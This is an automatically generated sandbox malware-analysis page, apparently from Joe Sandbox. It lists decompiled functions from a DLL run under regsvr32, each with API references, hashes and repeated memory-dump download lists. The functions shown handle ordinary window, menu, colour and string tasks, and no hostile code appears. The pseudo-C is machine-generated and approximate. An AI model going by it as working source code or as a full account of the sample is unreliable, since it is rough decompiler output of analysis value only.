Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 6f62bd56e1127a0764cdee5e767ab7c8d40c613bfc62528022a2d7073d029ef3
Instruction ID: c10569b7c8e6790cc313f25816ce72ff5bab895575690afdf95ea485d289b5f7
Opcode Fuzzy Hash: 6f62bd56e1127a0764cdee5e767ab7c8d40c613bfc62528022a2d7073d029ef3
Instruction Fuzzy Hash: E4017C36101327A7EB12AB658C05E9FBBA9EF50690F229039FC14D1010EB31E9159699

Uniqueness

Uniqueness Score: -1.00%

Function 100438C2 Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E100438C2(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E10041F9F();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E10041DB7(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E100438C2(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

0x100438c2
0x100438d0
0x100438d2
0x100438d2
0x100438d6
0x00000000
0x00000000
0x100438dc
0x10043906
0x100438de
0x100438de
0x100438df
0x100438e6
0x100438e8
0x100438eb
0x100438ee
0x100438f1
0x100438f4
0x100438f5
0x100438f5
0x100438e6
0x10043910
0x10043929
0x10043929
0x10043931
0x10043931
0x1004393c

APIs

GetTopWindow.USER32(?), ref: 100438D0
SendMessageA.USER32 ref: 10043906
GetTopWindow.USER32(00000000), ref: 10043913
GetWindow.USER32(00000000,00000002), ref: 10043931

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 6bf9da4bae7647d40ef62039d1957248172c2decf2ead13db83a377b175b97ec
Instruction ID: eeb4c7c9990b0680f2b5ae1f6ac187f205321868efbc4b4f2c9f070506565167
Opcode Fuzzy Hash: 6bf9da4bae7647d40ef62039d1957248172c2decf2ead13db83a377b175b97ec
Instruction Fuzzy Hash: BB014C3650161ABBCF03AF958C04EDF3F6AEF09390F119025FA0494061C776D931EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 10040DF8 Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10040DF8(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E10041F78(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E10045522(E10041F78(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E100454FB( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

0x10040df8
0x10040df9
0x10040dfb
0x10040e00
0x10040e2e
0x10040e30
0x10040e3c
0x10040e48
0x10040e4d
0x10040e52
0x10040e54
0x10040e54
0x10040e6b
0x10040e6b
0x10040e3c
0x10040e77
0x10040e7d
0x10040e7d
0x00000000
0x10040e7d
0x10040e06
0x10040e85
0x10040e85
0x10040e0e
0x10040e20
0x00000000

APIs

EnableMenuItem.USER32 ref: 10040E20
GetFocus.USER32 ref: 10040E33
GetParent.USER32(?), ref: 10040E41
GetNextDlgTabItem.USER32 ref: 10040E5D

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: a0057223c785596cf7261ae04013aab06b9b3dd6b720c568caa400297dda9dd3
Instruction ID: c1bd60ef72acf844a8b30ded12d228c4fc9e8180eb9e344904fd2b8db1ebe808
Opcode Fuzzy Hash: a0057223c785596cf7261ae04013aab06b9b3dd6b720c568caa400297dda9dd3
Instruction Fuzzy Hash: C1117531200A01ABEB29CF65C849B6AB7F5EF40351F228A2DF146D65A0CB30E891CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1006432D Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1006432D(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x10064331
0x1006433e
0x1006438e
0x10064397
0x100643a0
0x100643a6
0x100643a9
0x00000000
0x100643a9
0x1006435f
0x10064379
0x00000000

APIs

IsWindow.USER32(?), ref: 10064336
SendMessageA.USER32 ref: 1006435F
SendMessageA.USER32 ref: 10064379
InvalidateRect.USER32(?,00000000,00000001), ref: 10064382

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 42f0dfc1f088c32fed4aa95d6ed6be825e77b8d2e181369496128e10bb51f32f
Instruction ID: 6d49fee728a23c6cbb7fd45e10bb8831bed0a0bce7316cac5940551471a2703e
Opcode Fuzzy Hash: 42f0dfc1f088c32fed4aa95d6ed6be825e77b8d2e181369496128e10bb51f32f
Instruction Fuzzy Hash: D0015E70200718AFF7208F29DC45FAABBF5FB44750F11842AFA99D6290D6B0E851DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABC0 Relevance: 6.0, APIs: 4, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002ABC0() {
				signed int _t15;
				intOrPtr _t17;
				void* _t21;
				long _t22;
				void* _t25;
				void* _t28;
				signed int _t30;
				void* _t31;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;

				_t30 = 0;
				_t22 = GetCurrentThreadId();
				EnterCriticalSection(0x10096ac0);
				_t32 =  *0x10096d7c - _t30; // 0x0
				if(_t32 > 0) {
					do {
						_t15 = _t30 * 4;
						_t28 = _t15 + _t15 * 4;
						if( *((intOrPtr*)(_t15 + 0x10096d84 + _t15 * 4)) == _t22) {
							_t17 =  *((intOrPtr*)(_t28 + 0x10096d8c)) - 1;
							 *((intOrPtr*)(_t28 + 0x10096d8c)) = _t17;
							if(_t17 == 0) {
								UnhookWindowsHookEx( *(_t28 + 0x10096d88));
								 *0x10096d7c =  *0x10096d7c - 1;
								_t35 = _t30 -  *0x10096d7c; // 0x0
								if(_t35 < 0) {
									_t25 = _t28 + 0x10096d80;
									do {
										_t30 = _t30 + 1;
										_t21 = memcpy(_t25, _t25 + 0x14, 5 << 2);
										_t31 = _t31 + 0xc;
										_t25 = _t21;
										_t36 = _t30 -  *0x10096d7c; // 0x0
									} while (_t36 < 0);
								}
							}
						}
						_t30 = _t30 + 1;
						_t37 = _t30 -  *0x10096d7c; // 0x0
					} while (_t37 < 0);
				}
				LeaveCriticalSection(0x10096ac0);
				return 1;
			}

0x1002abc4
0x1002abcc
0x1002abd3
0x1002abd9
0x1002abdf
0x1002abe1
0x1002abe1
0x1002abef
0x1002abf2
0x1002abfa
0x1002abfb
0x1002ac01
0x1002ac0a
0x1002ac10
0x1002ac16
0x1002ac1c
0x1002ac1e
0x1002ac24
0x1002ac2e
0x1002ac2f
0x1002ac2f
0x1002ac31
0x1002ac33
0x1002ac33
0x1002ac24
0x1002ac1c
0x1002ac01
0x1002ac3b
0x1002ac3c
0x1002ac3c
0x1002abe1
0x1002ac49
0x1002ac58

APIs

GetCurrentThreadId.KERNEL32 ref: 1002ABC6
EnterCriticalSection.KERNEL32(10096AC0), ref: 1002ABD3
UnhookWindowsHookEx.USER32 ref: 1002AC0A
LeaveCriticalSection.KERNEL32(10096AC0), ref: 1002AC49

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 7c5c6465044aeed647cf5b1335197ad45330a01998d963168cb8d5eddc156d92
Instruction ID: ff068208a7337d9d256c49e140463adc192793c5a07bb9c89d651ca28304aebd
Opcode Fuzzy Hash: 7c5c6465044aeed647cf5b1335197ad45330a01998d963168cb8d5eddc156d92
Instruction Fuzzy Hash: B9017171A02B198FE724EF68DCC8AA633B4F74D341B918057E52AC3121DB376989CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10063E5A Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10063E5A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				L1005879D(__ecx, _t19, _a8);
				_t12 = E100452DE(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x10063e61
0x10063e65
0x10063e6b
0x10063e72
0x10063e7a
0x10063e86
0x10063e8e
0x10063ea0
0x10063eae
0x10063ebc
0x10063ec1
0x00000000
0x10063ec1
0x10063e8e
0x10063ec7

APIs

Part of subcall function 100452DE: GetWindowLongA.USER32(?,000000F0), ref: 100452EA

GetParent.USER32(?), ref: 10063E7F
IsZoomed.USER32(00000000), ref: 10063E86
GetSystemMetrics.USER32 ref: 10063EAE
GetSystemMetrics.USER32 ref: 10063EBC

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: 14d129b01f09ac9ac0d7962ebe04a8592d8334b87417eb6870597a42475cf4d8
Instruction ID: ed875a5c6287b30c1f89eba336ea5c128bc963309e975eecd3d18f71028f6439
Opcode Fuzzy Hash: 14d129b01f09ac9ac0d7962ebe04a8592d8334b87417eb6870597a42475cf4d8
Instruction Fuzzy Hash: D001D6326002146BDB01AFB8CC49F9EBBB8EF44740F114166FB15AB1D1D6B0AD04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10016FC8 Relevance: 6.0, APIs: 4, Instructions: 44
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E10016FC8(short* __ecx, CHAR* _a4) {
				void* _v16;
				int _t15;
				short* _t18;
				short* _t20;
				int _t22;
				short* _t23;

				_t19 = __ecx;
				_t20 = __ecx;
				__imp__#9(__ecx);
				 *__ecx = 8;
				if(_a4 != 0) {
					_t22 = lstrlenA(_a4) + 1;
					E1001B2B0(_t22 + _t22 + 0x00000003 & 0x000000fc, _t19);
					_t18 = _t23;
					 *_t18 = 0;
					_t15 = MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t18, _t22);
					__imp__#2(_t18);
					 *(_t20 + 8) = _t15;
					if(_t15 == 0) {
						E1003743B(_t19);
					}
				} else {
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				return _t20;
			}

0x10016fc8
0x10016fce
0x10016fd1
0x10016fdb
0x10016fe0
0x10016ff3
0x10016ffc
0x10017001
0x1001700c
0x10017011
0x10017018
0x10017020
0x10017023
0x10017025
0x10017025
0x10016fe2
0x10016fe2
0x10016fe2
0x10017033

APIs

VariantClear.OLEAUT32 ref: 10016FD1
lstrlenA.KERNEL32(00000000), ref: 10016FEB
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 10017011
SysAllocString.OLEAUT32 ref: 10017018

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocByteCharClearMultiStringVariantWidelstrlen
String ID:
API String ID: 3257503732-0
Opcode ID: 2abc29a30bd446de2f9fa0438afbcec48e294793608a568cfd1672f3465b81af
Instruction ID: c62c9e10889316ee65705ed0d0b99e83b33801cd3b73584e78f1b35cdaf280cc
Opcode Fuzzy Hash: 2abc29a30bd446de2f9fa0438afbcec48e294793608a568cfd1672f3465b81af
Instruction Fuzzy Hash: CB01F472500216BBE7109B65CC89A5ABFECFF492A1F104122F918C6150EB34D99487A1

Uniqueness

Uniqueness Score: -1.00%

Function 10044483 Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10044483(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && L1004E321(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

0x1004448d
0x100444f2
0x00000000
0x10044495
0x10044495
0x1004449b
0x00000000
0x100444b8
0x100444c1
0x100444cd
0x100444d3
0x100444d9
0x100444dd
0x100444dd
0x100444e7
0x100444ef
0x00000000
0x100444ef
0x1004449b

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 100444C1
SetBkColor.GDI32(00000000,00000000), ref: 100444CD
GetSysColor.USER32 ref: 100444DD
SetTextColor.GDI32(00000000,?), ref: 100444E7

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
